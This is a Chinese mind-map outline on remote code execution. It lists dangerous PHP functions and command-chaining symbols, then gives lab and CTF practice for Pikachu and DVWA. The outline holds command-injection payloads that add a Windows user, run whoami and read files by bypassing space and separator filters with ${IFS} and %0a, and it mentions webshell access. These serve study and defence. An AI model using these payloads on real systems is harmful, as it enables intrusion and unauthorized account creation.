亿图脑图MindMaster

1.远程代码执行

导图社区 1.远程代码执行

1.远程代码执行

由于程序中预留了执行代码或者命令的接口，并且提供了给用户使用的界面，导致被黑客利用，控制服务器。

编辑于2022-07-11 07:53:01

远程代码执行

桃

桃花岛岛主

他的近期作品查看更多>>

1.远程代码执行

社区模板帮助中心，点此进入>>

桃

桃花岛岛主

他的近期作品查看更多>>

相似推荐
大纲

远程代码执行

远程代码执行（RCE）

由于程序中预留了执行代码或者命令的接口，并且提供了给用户使用的界面，导致被黑客利用，控制服务器

为什么要执行代码？

网络设备的web管理界面

自动化运维系统

漏洞危害

1、获取服务器权限

2、获取敏感数据文件

3、写入恶意文件getshell

4、植入木马病毒勒索软件等

PHP-RCE涉及函数

代码code注入

eval()：把字符串code作为PHP代码执行

assert()：检查一个断言是否为false

preg_replace()：执行一个一一正则表达式的搜索和替换

create_function()：创建一个匿名函数并且返回函数名创

call_user_func()/call_user_func_array()：把第一个参数作为回调函数调用

usort()/uasort()：使用用户自定义的比较函数对数组中的值进行排序并保持索引关联

命令command注入执行

system()：执行外部程序，并且显示输出

exec()/shell_exec()：通过shell环境执行命令，并且将完整的字符串的方式返回

pcntl_exec()：在当前进行空间执行指定程序

passthru()：执行外部程序并且显示原始输出

popen()：打开进程文件指针

proc_open()：执行一个命令，并且打开用来输入/输出的文件指针

靶场案例

基础知识

Windows命令拼接符号

&&：左边的命令执行成功，右边的才执行例： ping 127.0.0.1 && echo'hello'

&：简单的拼接例： ping 111 & echo'hello'

|：上一条命令的输出，作为下一条命令参数例： netstat -ano | findstr 3306

||：左边的命令执行失败，右边的才执行例： ping baidu.com || ping baidu.net

Linux命令拼接符号

;：没有任何逻辑关系的连接符

&&：左边的命令执行成功，右边的才执行例： cp 1.txt 2.txt && cat 2.txt

|：上一条命令的输出，作为下一条命令的参数例： netstat -an|grep 3306

||：左边的命令执行失败，右边的才执行例： cat 3.txt || cat 2.txt

&：任务后台执行，与nohup命令功能差不多例： java -jar test.jar > log.txt&

piakchu

ping

127.0.0.1 & net user czh /add

127.0.0.1 & whoami

eval

phpinfo();

可以用蚁剑去连接

DVWA

low

127.0.0.1 & net user czh /add

CTF题目

过渡cat

payload：127.0.0.1;tac 123.php | base64

其他查看命令

cat：由第一行开始显示内容，并将所有内容输出

tac：从最后一行倒序显示内容，并将所有内容输出

more：根据窗口大小，一页一页的现实文件内容

less：与more类似，但其优点可以住前翻页，而且进行可以搜索字符

head：只显示头几行

tail：只显示最后几行

nl：类似于cat -n，显示时输出行号

tailf：类似于tail -f

过渡空格

payload：127.0.0.1;cat${IFS}123.php

其他空格

IFS$9、%09、<、>、<>、{,}、%20、${IFS}、来代替空格

过渡目录分隔符

payload：127.0.0.1;cd 目录;cat 123.php

使用：%0a代替目录分隔符/

过渡运算符

payload：127.0.0.1;cat 123.php

综合题

URLpayload：127.0.0.1%0acd${IFS}f*%0atac${IFS}f*.php

漏洞防御

1、开源框架，升级到最新版本

2、尽量不要使用命令执行的函数

3、如果必须使用，需要做白名单处理

4、用正则表达式对用户输入的内容进行处理

5、使用WAF